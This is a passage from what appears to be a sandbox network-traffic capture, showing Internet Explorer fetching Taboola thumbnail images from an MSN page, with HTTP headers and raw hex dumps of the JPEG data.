2021-10-07 13:51:55 UTC	94	IN	Data Raw: 1d 97 81 52 ac 7a 95 4e 43 16 60 ea b8 32 0e 7c f9 d9 7b d1 92 dc 37 8f ae 32 a2 58 8c 8a 32 42 fd 27 20 0c 8d aa 76 bc e9 f7 42 ea 0b c9 74 46 e8 53 60 aa b1 33 ea 04 f7 3b 0a 7b 71 3e c9 1b 9f 08 15 1f 49 27 d3 7d bf ca 07 bd 74 65 6b 92 46 98 76 e5 73 c9 a9 2e 6e 9a 5c c9 36 58 9c 9d df 25 b3 96 f7 34 84 27 9a 38 89 ca 1c 7d c3 3d c0 fb ce c3 b5 44 af 87 2b 3b 0f f0 81 d8 98 50 6d 92 7e ef 6a 32 6e d2 34 f3 b9 48 d9 bd 06 7e a1 51 75 2e ae 57 5e 70 a6 18 09 ee 9a a8 cb 72 36 7b 89 5b 20 6f be e7 fc 98 79 9b 2b 24 bc a2 7a e6 a4 16 70 39 59 6e 47 d7 33 e7 77 52 39 a8 e2 80 32 04 ca ab 12 07 a6 48 d6 4f f0 15 23 45 ac 0f 02 25 62 ad c6 06 76 0e c7 90 06 14 53 04 1a dd 62 1b c4 31 da 53 b6 a2 06 fa 46 de b4 06 cd ad 86 06 18 6c 32 79 c0 a2 17 5e 3c b9 2d Data Ascii: RzNC`2\|{72X2B' vBtFS`3;{q>I'}tekFvs.n\6X%4'8}=D+;Pm~j2n4H~Qu.W^pr6{[ oy+$zp9YnG3wR92HO#E%bvSb1SFl2y^<-
2021-10-07 13:51:55 UTC	95	IN	Data Raw: 4d 1a 89 01 70 aa 0b 63 00 53 b3 31 c2 92 2a 39 6e 00 1e 50 36 07 df f0 68 82 07 1e 23 0e 5c fa 0f 5c 1f 4a 11 42 71 9d 43 db 8a 77 19 0b a8 8f 32 96 38 1e 4f 73 c6 6a 40 f2 ba b1 5d 3e 70 38 0b 8f 6a 52 c8 19 df 5e e7 1c b7 ee e7 23 bf 72 6a 14 2c da 12 35 8c a9 f4 cb 12 00 3b 0c 8e d8 a3 2d fd fd c4 76 b6 d1 06 d9 9d 8e ec fe 88 bc b1 ec 37 a0 e2 dd 35 de 5c e3 0d 73 72 fb c9 2b 7e 67 f8 0c 0f c3 e7 9a 40 80 7b b1 c0 15 0b 5a da 5b 2d b5 b8 7e 43 a2 e9 5d 97 34 c6 08 94 a0 29 8d 4f 75 2e 42 88 c1 ee a3 73 9d 86 29 ad 7a 9b ab 30 81 1c 48 b0 f9 b6 55 81 41 76 f7 c9 af 9b 68 5c b4 71 c3 13 42 7d 06 a0 e0 54 f2 ba 9c 12 c7 19 c0 f7 a7 8f 4e 72 cc 75 0a 3a c9 03 b6 08 1e b5 86 7f b0 76 26 94 39 5c 93 b6 a2 3f 02 fc dd c0 62 09 21 56 18 50 65 e5 72 48 0a 14 Data Ascii: MpcS1*9nP6h#\\JBqCw28Osj@]>p8jR^#rj,5;-v75\sr+~g@{Z[-~C]4)Ou.Bs)z0HUAvh\qB}TNru:v&9\?b!VPerH
2021-10-07 13:51:55 UTC	97	IN	Data Raw: 0b 97 c7 7b 67 2a 59 b9 31 64 56 bb 6b 77 61 65 6c eb fe 34 a9 b1 95 b3 b1 44 3b 01 c1 6a 66 9e d3 5d 9c f9 24 9d 51 6c 37 3e d8 fc 43 12 29 28 4f 67 a2 84 93 12 b1 18 cc 47 2b 82 47 65 a2 a6 24 68 b4 1d db 51 38 00 50 63 1e 0c 50 9d c2 10 73 96 f5 6f d0 12 38 c6 59 8d 2b 29 c2 a5 bf 65 50 72 00 23 f9 d2 ab 9d b0 38 02 99 e0 96 69 45 bf 88 e5 d1 53 d0 66 be 5e 08 94 bb 30 8c c7 e2 0d 8a 84 18 f3 13 8f 43 46 d2 49 d6 39 0d ac e7 c3 0f 67 22 89 23 10 11 af c8 17 8a 10 db db fc 46 fd 55 ef ae 65 2d 2b c8 f1 78 08 07 01 54 02 59 8d 2a 5d 27 c7 37 3d 35 26 18 26 e2 d2 4b 40 c7 53 7d f8 78 6a 39 fa 4f 44 bb b7 82 48 12 72 ff 00 2c f7 fa ca b8 4e 06 b3 0e 18 fa e2 bc 69 65 f8 aa e9 a7 7f 7f 06 0f c0 c6 de f7 a6 dc c1 36 39 d1 24 65 4f f2 34 a9 17 9f c3 ff 00 46 Data Ascii: {gY1dVkwael4D;jf]$Ql7>C)(OgG+Ge$hQ8PcPso8Y+)ePr#8iESf^0CFI9g"#FUe-+xTY]'7=5&&K@S}xj9ODHr,Nie69$eO4F
2021-10-07 13:51:55 UTC	98	IN	Data Raw: ea b6 57 eb 1c cc 59 d0 db c7 2a e0 af 60 e6 6c 91 ce 05 12 e7 75 0d b0 7d 23 38 56 ec 45 17 21 43 2e c1 5b 0c 72 31 e8 47 14 86 48 d0 87 0a 0f e4 b2 7f 4f 6a 1a d4 8d 24 8f ab 7e 69 6d 6d ed 50 c9 75 78 e4 08 d6 10 b9 62 58 e0 01 8a bd 83 fe 9d 1b b3 02 dd 29 d1 2f 5a b8 4d c3 c8 0e 18 5a 82 0e 91 f7 9a bb b0 4b b7 1e 12 36 5a 39 14 0c ee 72 c0 1c 1d ab 0c 8e 89 28 00 28 04 8a 7b 7b e8 5c 34 72 c2 70 7d 8e 45 22 df db 00 27 45 e1 d7 81 20 1f 84 3a 30 21 95 86 41 07 90 69 a7 b0 62 5e 5b 75 c9 7b 73 dc a8 1c a7 f3 15 6c 6e e6 c4 96 31 3b 8f ac 1f f1 82 93 b9 1f 6e 7b f6 35 6f d4 3a e5 ec 92 fe a8 12 06 2b 0c 52 87 77 9e e1 86 e1 13 3b a0 3a e4 35 34 3d 1f a4 74 ae a5 d5 7a 85 dc c1 62 92 f6 fa 55 62 81 70 30 a5 a5 6c 85 5a 74 3d 72 e8 09 e0 8d cc 70 cf 34 Data Ascii: WY*`lu}#8VE!C.[r1GHOj$~immPuxbX)/ZMZK6Z9r(({{\4rp}E"'E :0!Aib^[u{sln1;n{5o:+Rw;:54=tzbUbp0lZt=rp4
2021-10-07 13:51:55 UTC	99	IN	Data Raw: 9e 4f 35 ad 30 01 04 11 bf a1 fc fb 11 45 e3 20 00 7b ae 3d fd 41 3b d2 b5 c2 92 15 f6 7d 40 fa fa d4 6a 10 31 24 9c 01 a4 66 87 4b f8 7e ca 32 f3 19 72 be 21 0d b6 91 c9 76 c6 02 0c 93 53 f4 ce 81 0d c1 4e 93 d0 18 15 78 f4 05 29 79 7e 47 33 b0 6d a3 e2 3a bb b3 b2 06 21 67 6f 7a d2 db 47 72 f2 9e 20 f1 17 43 11 c9 dc 50 37 13 64 98 a3 7d 60 6f dc 8c 8a d1 28 dd bd 89 a2 d9 fa a4 c7 14 d8 18 d4 4e e4 fe ef 53 58 c0 f2 c7 d9 40 ee de f4 9a 6d 9c 24 96 ae b9 49 90 f2 c7 b8 3e 86 bf 57 ce db 12 c7 31 6a f4 27 b5 06 56 00 ab 03 90 41 fd 11 cd 7b 67 60 6e 21 81 b2 54 33 1d 11 78 81 7b 3b ec 07 7a 3d 50 f4 8b e8 2d 63 37 4e 0d a4 01 1d b2 5b 4f d6 76 d5 85 d8 55 82 5e da 41 6b 04 f0 5a 15 52 e2 39 1c bc 10 84 3b 48 06 0b 05 a6 eb 37 97 56 3f 31 d5 a6 05 21 8a Data Ascii: O50E {=A;}@j1$fK~2r!vSNx)y~G3m:!gozGr CP7d}`o(NSX@m$I>W1j'VA{g`n!T3x{;z=P-c7N[OvU^AkZR9;H7V?1!
2021-10-07 13:51:55 UTC	101	IN	Data Raw: ee 18 09 ee 25 73 24 f2 e4 e7 77 38 db 23 3b 60 54 64 83 97 52 3e a1 48 43 27 a6 08 3f f2 28 8d 4b 90 31 bb ae 79 1e e3 14 5e 37 25 a2 90 90 06 c6 9e fa 76 cf ec 22 27 28 c3 92 7f a7 ad 5b 74 ce 93 0a 07 49 26 38 11 b2 02 42 c2 06 ee 5b b2 81 96 e0 0a be f8 3f e0 87 71 fd 90 66 0e b3 d6 93 93 e3 15 de d2 d9 f8 d2 3f 68 eb 50 58 74 eb 54 d1 05 ac 08 12 34 5c e7 81 ea 77 3f a0 34 f1 29 68 7f aa d7 87 24 f1 fc b4 c8 40 21 c1 fa 5b 07 d4 ad 79 61 b7 71 af 18 c6 f4 f0 c0 87 57 97 66 97 fe 16 82 aa 8c 2a 8d 80 ac 00 32 49 a9 21 b2 51 a5 08 e4 ef bb 11 ce 48 e2 9a 56 dc 20 7f 7d 89 23 6f 5a 7e 97 66 b3 c8 89 1c 10 a4 45 f7 e4 97 52 4d 4f 33 49 21 69 bc 47 d4 c5 94 83 9a 38 92 48 d6 27 03 0a 4e 3d 4f f1 a5 70 ea 0e a1 c1 c8 ce e7 b3 55 e5 c7 42 85 c2 db 45 65 1e Data Ascii: %s$w8#;`TdR>HC'?(K1y^7%v"'([tI&8B[?qf?hPXtT4\w?4)h$@![yaqWf*2I!QHV }#oZ~fERMO3I!iG8H'N=OpUBEe
2021-10-07 13:51:55 UTC	102	IN	Data Raw: c9 47 3c 13 2e 99 23 71 95 61 5e 34 20 e4 5a 48 f8 95 3d 91 db 91 ec 69 ad ae 87 31 5c 29 8d 99 b3 ef 80 45 5b db b1 90 2e 54 45 c1 1c f9 b3 4d 76 e1 86 10 c8 58 1c 7b 00 17 7d aa 46 9d 49 0d a3 2f ab 1b 83 9e c2 92 57 1b ad aa 9d b3 fe f2 39 1e c2 95 23 45 0a 88 a3 0a a0 6c 00 03 fc ac 37 11 ff 00 a2 54 0e 3f 81 a8 94 9e f1 bb a7 f2 52 2a 32 c3 83 23 bc 9f c9 d8 8a 8a 08 c7 09 12 04 1f c0 7e 9f ff d9 Data Ascii: G<.#qa^4 ZH=i1\)E[.TEMvX{}FI/W9#El7T?R*2#~

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.4	49850	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:55 UTC	102	OUT	GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fceedb38b7c05f6380193a62666745514.jpg HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: img.img-taboola.com Connection: Keep-Alive
2021-10-07 13:51:55 UTC	103	IN	HTTP/1.1 200 OK Connection: close Content-Length: 46724 Server: nginx Content-Type: image/jpeg access-control-allow-headers: X-Requested-With access-control-allow-origin: * edge-cache-tag: 364297243906297399083948393559119964732,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70 etag: "afa97cd47e1634980ecb88887f6f02d2" last-modified: Sun, 22 Aug 2021 23:37:07 GMT status: 200 OK timing-allow-origin: * x-ratelimit-limit: 101 x-ratelimit-remaining: 99 x-ratelimit-reset: 1 x-request-id: 340a32483dcaf0ce1e7c4ba9484814f6 x-envoy-upstream-service-time: 26 X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb804 Via: 1.1 varnish, 1.1 varnish Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 07 Oct 2021 13:51:55 GMT Age: 3049603 X-Served-By: cache-wdc5554-WDC, cache-dca17748-DCA, cache-mxp6955-MXP X-Cache: HIT, HIT, HIT X-Cache-Hits: 1, 1, 1 X-Timer: S1633614715.405612,VS0,VE1 Vary: ImageFormat X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fceedb38b7c05f6380193a62666745514.jpg X-vcl-time-ms: 1
2021-10-07 13:51:55 UTC	104	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 01 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 35 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 06 07 05 08 00 03 04 02 01 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fd 3d 93 24 c9 3e 49 f2 4c 93 24 f1 27 Data Ascii: JFIF&""&0-0>>T''#" "#>1++1>H<9<HWNNWmhm75=$>IL$'
2021-10-07 13:51:55 UTC	105	IN	Data Raw: 75 7a fa 58 a4 52 b5 44 52 01 01 7e 64 72 8e 25 86 8f da b9 fc d9 7f 46 76 36 e8 bc ab a3 92 81 c1 2a 8e 6b 8d 5e 6b 6b 86 94 84 70 4f 8d f0 18 e0 20 6d 47 a2 50 9b ae 14 8c 91 42 ec 3b 83 3a 12 48 31 5c 69 63 ab d4 f3 ad fc 2e 84 5e eb ae 6c cd e9 59 ff 00 53 36 b4 eb 50 bc d6 c0 fb af c9 51 62 c3 2a 5b 18 32 c5 38 9b 79 2a 09 97 a0 a0 5b 20 53 88 89 50 ca 4e 9a 1e 57 58 b3 48 57 43 20 33 aa 58 ee da e3 28 fc db c0 db 68 de 8a a3 b1 e4 fd 39 dd 1e 9a 0a b8 9c 5a a5 95 52 a7 71 d4 a7 1d 46 29 50 b9 c2 8a a5 a6 93 89 90 90 68 89 23 b8 c9 73 a8 85 cc a6 8e 99 c1 42 cc bd ca 16 5a 86 ca e0 df 5c 98 da f1 b5 45 99 70 d8 2e 9d df ad 27 55 ac 94 f9 b5 88 bf 2b b6 48 3f 09 82 a8 7a 2d 31 2d 84 61 4b 97 93 b7 18 61 41 b6 df 14 81 da 0e 48 08 55 95 cb 71 98 a0 38 Data Ascii: uzXRDR~dr%Fv6k^kkpO mGPB;:H1\ic.^lYS6PQb[28y*[ SPNWXHWC 3X(h9ZRqF)Ph#sBZ\Ep.'U+H?z-1-aKaAHUq8
2021-10-07 13:51:55 UTC	106	IN	Data Raw: 00 2f a1 61 d0 f4 2e 79 b2 65 62 d4 da 77 bb ec 06 48 c6 41 3f d4 65 b4 7a 2d 29 e4 59 6e 47 67 a1 03 17 9a 21 d1 43 f8 2c a1 6f b4 c7 e6 2f 49 46 d7 19 9e d3 50 38 a7 80 71 07 8c 31 50 ae cb 3f f1 08 fb 6d 51 2a 62 7b 7f cc c8 9c ad cb 08 41 40 63 6c 75 89 83 20 6b b7 1a 9d a0 5c c8 8a 29 4c 9f 75 d1 f3 5a 02 51 e8 fd 85 b8 60 b6 14 07 a0 4c ec 6d 3e c3 9b 54 5d 19 3b e9 d5 6b 92 6c 00 dd da a0 47 18 2e 80 86 db 04 b7 5d 9b 53 cf 8d c8 43 00 cf a4 c3 5a 92 81 f4 9a 19 62 ba ca e7 73 5c 03 db 14 9e 07 3a e9 1a 36 9b 4b f7 7d 18 6a 75 22 6e 39 c8 41 ab f7 a8 ac 19 9e cf 51 0d 7b 5e 75 3a c2 da 31 db 3d cc ea 34 95 02 dd c6 83 7f 83 da 0d 59 fa cc 4b 2c 47 0f a7 6b 2c b9 a5 78 6f 4f c3 f9 e8 ae 53 87 b5 ca 74 de cb 9b 4e 21 83 fd f8 13 e4 a7 1e 4f b5 50 0a Data Ascii: /a.yebwHA?ez-)YnGg!C,o/IFP8q1P?mQ*b{A@clu k\)LuZQ`Lm>T];klG.]SCZbs\:6K}ju"n9AQ{^u:1=4YK,Gk,xoOStN!OP
2021-10-07 13:51:55 UTC	108	IN	Data Raw: 9b 6a e1 52 51 9f 64 b9 60 c0 fb 37 76 55 90 02 8f 06 27 c6 c6 65 b9 6d ea 1d 79 7d 81 73 be 77 66 43 42 d0 cd 6e 57 21 ee fb ef ff 00 81 34 ce 62 ca 1e a8 1a b6 af ff 00 8e fb 35 5e 46 d8 6c 71 fc a5 e1 6a fd 2b 4d 73 3e 7b 8f b0 44 8d 75 69 1e a9 61 5a bc b6 64 52 b4 aa 8b bb 3f ea ec 59 39 be 98 21 99 e8 20 6b 92 57 b2 4b 94 70 36 8f 2b 97 d5 fa c4 54 d9 0d e6 44 7e 3d d2 56 1b a9 33 9f be 01 81 e4 60 df a6 70 35 7d ce cc f8 b9 22 62 e1 6f 1e fb f9 9c 4a 8d 6e b0 3e 34 82 1a 08 3b eb 3a d0 4b d5 36 7c 71 5b 27 c9 cb 3b 48 50 50 41 0c e7 1e 42 7f 4a 20 a1 94 a8 da 63 f5 6a b6 17 63 b3 be a3 c7 eb 1e 83 b0 a1 b9 39 6c 86 dd 6e 51 52 21 01 1a db fa 23 af cd cc 06 f6 8d 9a 7c e0 c2 2e 92 ae 71 d3 21 b8 34 d8 c1 76 3b 48 ff 00 64 de 15 7a 8d 2e 47 3a 53 21 Data Ascii: jRQd`7vU'emy}swfCBnW!4b5^Flqj+Ms>{DuiaZdR?Y9! kWKp6+TD~=V3`p5}"boJn>4;:K6\|q[';HPPABJ cjc9lnQR!#\|.q!4v;Hdz.G:S!
2021-10-07 13:51:55 UTC	109	IN	Data Raw: ab 12 22 19 47 3a 67 a6 b1 96 86 b6 1a 92 b9 f6 9d 63 ad 2d 81 5f 5a 12 14 8f 9d 11 d8 66 75 15 61 d8 9f 5c c7 c3 86 52 56 d2 aa 19 d6 66 7c d2 14 6d 86 85 de ae cf 68 a6 8a 6b 4b 9f ec d7 35 0d b8 9e ab 0d 1d 14 39 a4 84 0c 59 b9 d3 68 75 ac 89 06 8e 91 d2 ab 30 31 b3 8b 98 2d f5 d5 aa ea 31 d9 c8 50 75 49 e6 57 3a 4b 97 79 cb 3b 0e d9 6b e9 b6 cd 6f f9 9e 7c 03 0e ab 43 af 03 8c 71 75 a5 c2 41 6f 12 84 e0 6f 76 5a 11 2e a5 8f 5f 96 4e f6 ab 71 0f 59 75 2b 95 28 16 cd 1d 64 53 3d 80 d1 81 40 ad 59 98 d0 35 d0 9c bb 31 ba b7 da 6f 19 02 9a f7 b6 7a b1 ba 8b 5c 81 d1 39 fe 40 63 24 1e a1 a7 f2 31 70 be d9 fa f9 51 df 5c ec db a5 13 c5 bf c8 77 bb 2c 0f 66 d4 e3 50 bc e1 10 a1 af 52 08 cd 11 9d 13 a8 e9 74 d8 c6 25 45 57 71 d9 37 49 e6 88 4c c0 fa 4b 31 85 Data Ascii: "G:gc-_Zfua\RVf\|mhkK59Yhu01-1PuIW:Ky;ko\|CquAoovZ._NqYu+(dS=@Y51oz\9@c$1pQ\w,fPRt%EWq7ILK1
2021-10-07 13:51:55 UTC	110	IN	Data Raw: 47 f9 39 3d 47 a0 c5 a6 3b 18 45 56 5b 5f 57 2d a9 5a 18 a0 04 82 4a 1d 4f 8b 73 ea 4a 56 2f 86 6c 1b 0a 2f 96 9f b1 1e f1 84 14 04 3e 6d 1a 7b fe 6e d0 1c 8c 9b f5 89 33 71 af 55 d3 a6 35 94 97 0b 7c dd 18 ad a1 06 13 24 7a ab cc 4c e8 6f 54 e7 fa 1e 87 1b 29 d4 bb e6 fb a9 8f b5 f1 32 93 62 fb b5 2f 39 7b 42 1a 61 32 77 00 f3 da 2b 59 8f c4 84 59 dd 6f 9d 80 e7 21 d9 12 66 9e dc 95 93 b8 64 d7 a8 79 ef 50 4a a9 d1 1f 5a 36 de 8b 4b 54 96 35 a1 c3 9c f3 5a 3f 8c 1b 32 8b c9 37 84 3d ca 5e 49 fe 4c bf b7 b3 db 23 c5 57 6b 5b 6b 57 a1 d4 9e c9 96 85 e5 ef 1d d7 b4 d4 d8 d0 75 78 6c 55 0d 21 e1 57 db 9e 62 b9 43 18 db 49 7a bd 2e ea 5a f7 54 67 e4 b7 9c ec c7 fa 1e fd a6 fd 6b 05 31 ce b1 b5 9e 72 dd 93 73 59 a0 4b 42 4e 57 4f 37 1a 07 c9 ea bd 43 7c 8a db Data Ascii: G9=G;EV[_W-ZJOsJV/l/>m{n3qU5\|$zLoT)2b/9{Ba2w+YYo!fdyPJZ6KT5Z?27=^IL#Wk[kWuxlU!WbCIz.ZTgk1rsYKBNWO7C\|
2021-10-07 13:51:55 UTC	112	IN	Data Raw: d2 bb aa 2c b4 49 b7 2b b5 c2 c8 03 2f 54 c8 f1 95 c2 96 2f b6 bd 60 ae b9 80 b7 d9 c5 5f 8c d8 25 f0 f7 41 6d 34 7c bf e9 6c 2f b5 01 3e b2 2e 51 80 1e f3 b7 cd 84 aa d8 49 d7 ba 1c ea 97 39 49 ba cb 82 23 1a 7e d4 d4 27 e1 be bb f7 d6 4a 94 a1 e3 cb d6 0c 43 07 57 f9 c4 17 d9 ed 05 55 7d 58 75 df bd 5f 9b f7 23 62 86 09 7f 2e 79 fc 06 29 20 e3 05 55 d9 ec e1 39 ca e6 f2 e7 da 50 46 63 12 19 9c 78 aa 9b af c4 39 5d e8 da df 9b 36 bc ae fd a5 50 3b 2a c5 b8 4a 4a b2 6d f2 c3 5e bb a0 76 40 21 78 96 f8 bf 2d a3 20 d2 6e eb 1a 45 da 1c 96 60 ea 7d a8 5c ae d3 12 16 49 92 9c f2 6c 92 88 a3 6d 9d a9 86 eb 47 9f 0c d7 2b c8 55 d1 f2 9a 16 ab f2 ed d1 28 7d a7 c8 4e 43 ac bf 28 be f3 c3 b4 c6 3f 24 93 32 33 72 ed 48 fd 99 59 97 e2 ce 76 c3 9a 81 cc f2 f9 bf 56 Data Ascii: ,I+/T/`_%Am4\|l/>.QI9I#~'JCWU}Xu_#b.y) U9PFcx9]6P;*JJm^v@!x- nE`}\IlmG+U(}NC(?$23rHYvV
2021-10-07 13:51:55 UTC	113	IN	Data Raw: 4e b4 1a cb 22 e3 b4 3f d6 16 29 cc f3 f5 96 b1 26 ea 49 6c 02 6c eb 4f 23 ae 2e 99 e7 48 56 62 65 2f 56 e8 f9 d6 7f 25 06 8b 16 5a 6b 4d e8 c2 a7 55 e6 3b 24 a3 11 9c 19 2a ea c6 12 a0 a1 55 75 c2 c2 a2 7a 9a 94 2a 1b 9e 05 9b cc 90 76 89 b3 54 09 0c d3 9c 1e b5 d5 5a e1 97 35 45 6a 97 42 8c 91 e9 8a e8 05 e6 95 51 57 e3 88 0d 03 3a 08 36 76 e9 90 41 b8 7b 8b c0 62 c8 52 28 b5 78 b1 ff 00 52 44 2b 9d 38 7f eb e7 91 ac ce c3 88 70 d7 22 60 40 14 1f 14 ce 84 b9 55 fa 21 c9 6d a2 60 bd 79 4e 60 f3 44 28 34 ea 3c 5a 49 79 27 a7 a8 89 42 7c f3 dc d7 3d 77 72 e3 73 39 e7 2b c9 11 8e 48 76 f4 05 e0 be 95 5b 35 fa aa 0e cd e6 82 5b 63 22 ae 78 22 cd 19 47 bf e8 ba f6 34 32 42 70 ca 46 a8 87 60 fb 59 a9 14 20 33 b2 b6 9f a2 23 49 9f 50 8c 31 2a 0a 9e 93 d1 72 9c Data Ascii: N"?)&IllO#.HVbe/V%ZkMU;$UuzvTZ5EjBQW:6vA{bR(xRD+8p"`@U!m`yN`D(4<ZIy'B\|=wrs9+Hv[5[c"x"G42BpF`Y 3#IP1*r
2021-10-07 13:51:55 UTC	114	IN	Data Raw: 36 80 e2 b6 ad ff 00 49 6f 8d 4d 29 db 81 cf ed 11 c1 55 5f 6c a8 6e 29 ac 5c d7 95 28 af cc 0f 3f 20 63 64 01 49 ca 8d 99 35 16 34 37 5f 27 fe e6 03 8f 26 bf f2 f9 4b da f1 c3 29 f2 23 7f 88 3e 26 53 99 35 af 01 ab 71 1c e1 38 81 52 59 6f 7f 17 da 3e 10 56 c3 16 02 8e d3 d1 39 5f 4c 85 9b 58 43 4a c6 ef bc c8 da 5b 60 4b 7f 53 6f fa 4c 94 ea a9 95 8e 92 ea 43 76 20 dc c2 af 87 03 21 6b a0 14 03 bc c5 89 41 0c 45 85 fd cc c6 83 d4 fa c6 fe 2b 7f 0e f5 1f 36 0c cb a4 85 39 78 5b a0 a7 a7 93 30 64 cb 9b 3b 8b 5f 65 fe 28 17 bf 78 0a fa 73 90 69 0c c4 8d c8 d9 42 8a 13 16 22 e1 b2 b6 f5 be a6 e2 0c 78 88 2e c4 b9 27 6b 15 fb 4c 79 34 ad 00 58 73 50 65 a2 7f 87 b1 de a5 9e 15 7c 88 73 3b d0 6b b1 3f 89 5b 03 0b e4 ec 6a 61 39 55 59 f0 e5 74 3d b8 06 7a 7f f1 Data Ascii: 6IoM)U_ln)\(? cdI547_'&K)#>&S5q8RYo>V9_LXCJ[`KSoLCv !kAE+69x[0d;_e(xsiB"x.'kLy4XsPe\|s;k?[ja9UYt=z
2021-10-07 13:51:55 UTC	116	IN	Data Raw: 81 f5 1d 4f c7 fb cc 6e 4b 7c 39 6b 17 c4 cc 77 d3 1d 09 3b 50 10 0c 64 10 dd f9 9b 30 3a 42 9d a1 4a 1d 89 9f 3d 5d 84 a1 76 20 d4 01 50 97 b0 de 23 a1 61 a8 d4 60 56 85 9d e2 b5 e9 2a a6 8c 3a 18 80 a3 ef d6 53 35 0a a0 3f 28 2d 41 db 6b 9b 50 6f da a3 85 3b 89 ab 48 11 99 94 ea 55 da 2b 96 bf e1 ed 5f 9d c0 dc 01 7f 94 04 de c9 5e 79 8e 83 22 91 57 7c df 13 18 1a 8e 6f fd fa 07 ee a0 86 9e 9d 2a d5 af 66 c9 fb a1 9a 06 25 d5 66 dd 41 23 b2 ff 00 fb 31 84 50 1c ae ca bf a9 3b ef 17 0b 35 92 84 93 e2 63 f4 79 47 d6 4d 41 e9 09 34 5c 01 df 99 8f d3 e3 57 24 12 68 55 50 13 2f b2 10 0c 7d ec 92 6e 16 ea 40 d5 0e 6d 5b 84 0a 63 31 7d 3f 1a 31 bd b5 36 c3 e7 7c f4 33 59 61 77 bc b6 d4 28 56 d0 2d de ab db b4 66 57 d3 f3 a1 01 d2 4d 8b b3 bc f7 54 ae fb 4a 05 Data Ascii: OnK\|9kw;Pd0:BJ=]v P#a`V:S5?(-AkPo;HU+_^y"W\|of%fA#1P;5cyGMA4\W$hUP/}n@m[c1}?16\|3Yaw(V-fWMTJ
2021-10-07 13:51:55 UTC	117	IN	Data Raw: ad 1d a0 26 c9 5d a1 67 3b 86 aa 8b bd 6a 01 ae 65 24 90 22 0f 90 ad e1 77 18 76 f1 71 58 3a 64 c8 50 ae b2 40 bf 1d 44 d9 f0 95 ea 87 f5 07 98 c3 7b 53 47 8f 3b c3 b0 02 f8 ef 15 af 88 aa 5c d0 e3 a9 8a 8a 83 6f cc c6 60 cf ac 0d 86 c3 cf 98 04 05 ae 2a ae 90 c7 68 ce 95 4a b1 0a d9 15 08 51 44 d7 da 16 26 6c d5 70 ec 46 fb 41 54 2a ef a4 0c ca 77 02 64 6d 54 02 84 1f 7b 8c 43 10 2c 5c 70 53 79 79 1a 87 f6 11 b5 d8 b1 c4 2f a0 ad 80 b1 ce 9f 4e 81 10 59 50 58 76 8a b9 93 da f7 2b e2 ac aa 3f fb 59 8d 90 a9 1a 79 17 c7 6e 22 3e 33 95 39 1c 13 e2 a6 4b ca 71 ad 0e 36 26 2e 14 45 1b d9 ea 60 70 a3 4a 88 e7 57 3c 76 87 f0 a5 5f 91 16 39 20 45 0a cc 61 18 c1 a9 90 a9 15 d6 e0 ab 1b 0f bc d3 b0 d3 b0 85 01 5a 3d 37 84 6a 1b 80 a3 68 15 2a aa 64 60 36 06 c9 81 Data Ascii: &]g;je$"wvqX:dP@D{SG;\o`hJQD&lpFATwdmT{C,\pSyy/NYPXv+?Yyn">39Kq6&.E`pJW<v_9 EaZ=7jh*d`6
2021-10-07 13:51:55 UTC	118	IN	Data Raw: 62 85 24 fc b9 de 5e d7 18 8e 90 be 81 7c df 02 62 52 2c b1 f9 1e 4c ad 5e 04 35 b7 e0 67 34 23 6e 60 10 32 b0 d8 b5 81 7f 9c 3b 95 f9 50 3c 8f 02 63 c6 02 82 08 d8 1f 97 7b 31 d1 35 56 fc 5d 9e 23 32 ea 7a 4a 4b db cc f7 1c e3 41 8d ca f5 fd 6e e6 3c 81 41 d6 84 92 77 f0 20 6c 41 df 23 a9 d5 e3 bf 98 e8 5e 99 8f ca e8 08 e8 58 9b 73 57 b4 ac 67 4e 80 68 1a 1e 63 31 16 ab 44 f4 b3 35 3e c0 81 71 d8 8a 5a 3b 78 e6 7b 94 8a 14 01 51 d8 b1 82 ba c4 ac 99 0e 43 c0 d9 44 06 12 4f d8 42 6a 7c 8e f2 ef 63 04 b1 7f 82 15 d2 db 51 ef 03 06 63 a4 03 73 59 a5 4b f3 da 2e f6 37 3b 69 de 2e 91 54 2e 85 50 eb f7 b8 d9 09 02 af 4a f1 15 f7 b3 bd 8a ba b3 09 52 c4 a9 3e 44 01 86 92 4f 7d 8c f8 1d 34 48 20 18 0d 1b 62 0b 5e fc dc 05 d9 d4 32 83 e4 43 88 25 d8 dc 08 c5 74 Data Ascii: b$^\|bR,L^5g4#n`2;P<c{15V]#2zJKAn<Aw 